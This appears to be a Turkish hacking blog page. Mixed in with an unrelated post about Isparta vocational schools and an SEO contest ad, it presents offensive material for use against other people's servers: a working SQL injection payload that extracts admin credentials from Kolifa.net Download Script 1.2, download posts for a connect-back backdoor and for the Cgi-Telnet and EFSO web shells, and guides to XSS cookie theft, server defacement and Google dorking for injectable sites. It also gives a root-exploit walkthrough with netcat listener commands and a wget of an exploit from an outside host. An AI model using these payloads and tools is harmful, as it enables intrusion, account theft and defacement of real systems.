• Kolifa.net Download Script 1.2 Sql Injection Vulnerability

Download scriptine ihtiyacım vardı ilk rastladığım script Kolifa.net Download Script 1.2 idi. Guvenliğini falan kontrol ettim indir.php  dosyasında id parametresinden sql injection saldırısına maruz kaldığını gördüm.

Source :

<?php
//*****************************
//*****************************
//********** KOLİFA ***********
//********** DOWNLOAD *********
//********** SCRİPT ***********
//*****************************
//****** www.kolifa.net *******
//*****************************
ini_set('error_reporting', E_ALL^E_NOTICE);
include("ayarlar.php");
require('fonksiyon.php');
$baglanti    = mysql_connect($dbhost,$dbkullanici,$dbsifre) or die("Veritabanına bağlanılamadı.");
$sec        = mysql_select_db($db);
$dwkodu=strip_tags($_GET['id']);
$act=strip_tags($_GET['act']);
?>
Gördüğünüz üzere 15. satırda script_tags fonksiyonu yalnız kullanılmış html kodların çalışmasını engellemek için fakat güvenlik için yetersiz. Sql injection attack ile database den veri çekilebiliyor. Dahil ettiğimiz sql sorgusundan sonra sayfada çıkan “Buraya Tıklayın” ın bağlantı adresinde çektiğiniz veri çıkacaktır.

Example Sql Inject Code :

indir.php?id=-1/**/union/**/select/**/concat(admin_adi,0x3a,admin_sifresi)/**/from/**/yonetici/*

Demo Site : Kolifa.net Download Script 1.2 Demo

Download : Kolifa.net Download Script 1.2 Download

• ConnectBack Backdoor Shell vs 1.0

r57, c99 vs türevleri shell’ler ile servera backconnect yapılmadığı durumlarda kullanılabilecek backconnect tool. Servera upload ettikten sonra chmod 777 verip çalıştırabilirsiniz.
Kullanımı : perl dc.pl [ip no] [port]  o anki kendi ip numaranız ve modem de açık olan portu kullanmanız gerekmekte.

ConnectBack Backdoor Shell vs 1.0 Download

Isparta Üniversitesi Şarkikaraağaç myo okulunu kazanmışım. Myo ile ilgili internetten araştırma yaparken birçok siteyle karşılaştım.
Şu anda yurt mu ev mi daha karar vermedim ama oraya gidip Kararımı vermeyi düşünüyorum Ordaki Okullar yurtlar hakkında bilgi almak için internetten bir çok site bulabilirsiniz.

Yalvaç Meslek Yüksek Okulu da buraya bağlı bir myo yalvaçta biraz daha teknik bilimler ön planda

ek olarak Uluborlu Meslek Yüksekokulu da bu üniversitenin diğer bölümlerinden diğer myo larıda baya iyi durumdalar mesala
Sütçüler Prof.Dr.Hasan GÜRBÜZ Meslek Yüksekokulu Bu okuldada eğitim iyi düzeyde..
Ben Tercihlerimde Isparta Senirkent Meslek Yüksek Okulu vermiştim ama gelmedi gelmemesi o kadarda bozmadı
Süleyman Demirel Üniversitesi Keçiborlu Meslek Yüksekokulunu daha önce görmüştüm bizim
Isparta Gelen Dost Meslek Yüksek Okuluunda arkadaşım okuyor oda asıl olarak eğirdir gölüne yakın olan
Isparta Eğirdir Meslek Yüksek Okulu Bu okul göle yakın olmasıyla iyi biraz ama diğer okullarda iyi mesala
Isparta Atabey Meslek Yüksek Okulu neyse Hepsine Başarılar Diliyorum inş
Şarkikaraağaç Meslek Yüksek okulu ndayken Kurtlar Vadisi Pusu yu Kaçırmam Kurtlar Vadisi Pusunun Bölümlerini full izle rim

• Cgi-Telnet

Cgi-Telnet ile Safe mode : On ( on secure ) yani güvenlik modunun açık olduğu serverlarda komut çalıştırmanıza yarar (execute commands). Cgi-Telnet i kullanabilmeniz için serverda perl kurulu ve çalışır durumda olması gerek. Script (cgi-telnet) in ve kullanıldığı dizinin chmodu 755 olmalıdır. Script arayüzünü görüntülemek için ilk önce şifre girmeniz gerekiyor. Cgi-Telnet’in 45. satırında $Password = “changeme”; changeme yazan kısma istediğiniz şifreyi yazın. Scripti Windows serverda çalıştıracak olursanız Cgi-Telnet’in 48. satırında bulunan $WinNT = 0; kodun 0 olan kısmı 1 yapıp kaydedin ($WinNT = 1;) . Daha sonra http://www.[site]/cgi-telnet.pl olarak web browserınızda açıp işlemlerinizi yapmak kalıyor.

Cgi-Telnet Download

• EFSO

EFSO , Windows Serverlarda kullanabileceğiniz FSO script türünün en iyisi. Bir çok özellik bulunduruyor; regedit, cmd,dosya-klasör işlemleri,mail bomber sayabileceğimiz özelliklerden bir kaçı. .TR siteler kullanılmaması için kendini imha etme özelliğide mevcuttur.

Script yazarının dilinden;
Biz bir FSO & MSWCTools & XMLHTTP Component lerini kullanarak Server a site üzerinden HTTP protocolunden erişim sağlandığında, Size Server ın tüm imkanlarından yararlanmanız için, Permission, şifre, gizli tüm içeriklere direk ulaşma, yada aşma gibi özelikleri olan. Server ı çökertmeye , hatta kaynaklarını son damlasına kullanabilen SaVSaK.CoM adına hizmet veren Bir Canavar yarattık.

EFSO Download

• XSS’ye Basit Giriş

Xss açıkları hakkında temel oluşturacak basit xss yönetimin anlatıldığı 2 videoyu paylaşacağım sizlerle.  İlk videoda XSS açığının bulunduğu sayfa tespit ediliyor. İkinci XSS videosunda ise bulunan açığın lehimize nasıl çevirebileceğimiz anlatılmış. PM. yolu ile gönderilen xss linki karşı tarafın tıklaması sonucu Cookie Sniffer aracılığıyla saldırganın eline geçmekte ve cookie editör leriyle gelen cookieleri kendikileriyle değiştirmekte ve karşı tarafın accountunu ele geçirmekte.

XSS Video Download

• Linux Server Hacking

Linux Server Hack ediliş videosu. Yetki kısıtlaması olmayan linux serverlarda dizin atlayarak (bypass edilerek) flashhaber.com.tr’nin yazılabilir bir dizinine index dosyası yazdırılıyor. Videoda /var/mail dizininden username alındıktan sonra o kullanıcı adının hangi domaine ait olduğunu öğrenmek için /var/named dizininden alınıyor sonuç olarak amaca ulaşılıyor.

Linux Server Hacking Video Download

“adtech ile reklam 2.0 dönemi başlıyor ve Trkycmhrytllbtpydrklcktr r10.net seo yarışması”

Adtech’in Spornsorluğunda r10.net webmaster forumunun 2008 seo yarışmasında r10seoyarismasi.com a başarılar dileriz.

“adtech ile reklam 2.0 dönemi başlıyor ve Trkycmhrytllbtpydrklcktr r10.net seo yarışması”

www.r10seoyarismasi.com

• PostgreSQL Sql Injection

Veritabanı olarak PostgreSQL kullanan sistemlerde sql injection olayının nasıl uygulandığını anlatan bir video. Videoda “supplied argument is not a valid PostgreSQL result” hata cümlesi google arama motorundan  aratılmış ve google un indexlediği sql (PostgreSQL) hatası veren siteler listenledikten sonra sql inject uygulanarak veritabanından veri çekildiği gösterilmiş.

PostgreSQL Sql Injection Video Download

• Linux Server Root

Linux Server Root işlemi yaparken kernele uygun exploit, backconnect tool’lar, netcat ve servera bağlanmak için açık bir porta ihtiyacınız vardır. System32 ye atılmışsa netcat dosyaları msdos’a girip nc -vv -l -p [port] yazmanız yeterli. Eğer System32 ye kopyalanmamışsa netcat pc de bulundugu dizine gidilmeli msdos tan sonra server a bağlanmak için komut yazılmalı. Server’a bağlandıktan sonra yazılabilir bir dizine wget fetch curl GET vs komutlarla exploitimizi çekeriz. ( wget http://www.lmfrf.org/rootexploit ) daha sonra full yetki vermemiz gerek server’a çektiğimiz exploite (chmod 777 rootexploit). yaptıktan sonra geriye exploiti çalıştırmak kalıyor. ./rootexploit  <—–<< ßu i$lem ßiraz uzun sürebilir, bazende çalışmayabilir her server rootlanır diye birşey yoktur rootlanmayacak serverda yoktur. Sıra kontrol etmeye geldi “id” komutunu kullanarak serverdaki yetkimize bakarız “uid=0(root) gid=0(root) groups=0(root)” gibiyse yetkiniz root olmuşsunuzdur yok değilse işlem başarısız olmuştur.

Linux Server Root Video Download